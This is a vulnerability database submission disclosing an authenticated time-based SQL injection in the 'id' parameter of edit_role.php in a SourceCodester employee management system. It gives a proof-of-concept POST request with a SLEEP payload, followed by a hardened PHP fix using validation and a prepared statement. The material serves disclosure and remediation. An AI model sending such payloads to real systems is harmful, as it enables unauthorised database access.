| Field | Value |
|---|---|
| Title | SourceCodester Best employee management system 1.0 SQL Injection |
| Description | Time-Based SQL Injection in edit_role.php (full submission text below) |
| Source | ⚠️ https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md |
| User | sh3rl0ckpgp (UID 77534) |
| Submitted | 2024-11-13 01:05 PM (2 years ago) |
| Moderation | 2024-11-14 09:09 AM (20 hours later) |
| Status | Accepted |
| VulDB Entry | 284529 [SourceCodester Best Employee Management System 1.0 /admin/edit_role.php id sql injection] |
| Points | 20 |

Description (as submitted):

Vulnerability Type: Time-Based SQL Injection
Product Name: Employee Management System
Software Link: https://www.sourcecodester.com/php/17689/best-employee-management-system-php.html
Advisory Link: https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md
Affected Script: edit_role.php
Author: sh3rl0ckpgp
Vendor Homepage: https://www.sourcecodester.com
Vulnerability Status: Verified

Proof of Concept (PoC)

Vulnerable Request:

```http
POST /hr_soft/admin/edit_role.php HTTP/1.1
Host: localhost
Content-Length: 38
Content-Type: application/x-www-form-urlencoded

id=1';SELECT SLEEP(5) AND 'test'='test
```

PoC Payload: `1';SELECT SLEEP(5) AND 'test'='test`

Explanation: This payload introduces a 5-second delay if the injection is successful, confirming the vulnerability.

This vulnerability has been verified and documented. Please assign a CVE to facilitate tracking and awareness.
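The remediation a reviewer would expect for the `id` parameter of the affected script, as an added example that is not the project's own code: the assumed vulnerable pattern (string concatenation of the POST value into the query) is shown only in a comment for contrast, and the connection variable, table and column names (`$conn`, `tbl_role`, `role_name`) are placeholders, since the page does not show the script's source.

```php
<?php
// Added example, not code from the vulnerable project: hardened handling of
// the `id` parameter for an endpoint like /hr_soft/admin/edit_role.php.
// Assumptions (placeholders): a mysqli connection in $conn and a table
// `tbl_role` with an integer primary key `id` and a column `role_name`.

// Assumed vulnerable pattern, for contrast only: the raw POST value is spliced
// into the SQL text, so a value such as   1';SELECT SLEEP(5) AND 'test'='test
// is parsed by the server as SQL, and the SLEEP(5) becomes an observable
// 5-second delay (the page's time-based indicator).
//   $sql = "SELECT * FROM tbl_role WHERE id = '" . $_POST['id'] . "'";
//   mysqli_multi_query($conn, $sql);

function fetch_role(mysqli $conn, array $post): ?array
{
    // 1. Validate: the id must be a positive integer. Anything else (quotes,
    //    semicolons, SQL keywords) is rejected before it reaches the database.
    $id = filter_var(
        $post['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Parameterise: the SQL text is fixed at prepare time and the value is
    //    sent separately, so it can never be parsed as SQL. Stacked statements
    //    and quote-breaking payloads have no effect on the query structure.
    $stmt = $conn->prepare('SELECT id, role_name FROM tbl_role WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}
```

The existing admin session check for the /admin/ pages still applies on top of this; the parameter handling fixes the injection, not the authentication boundary.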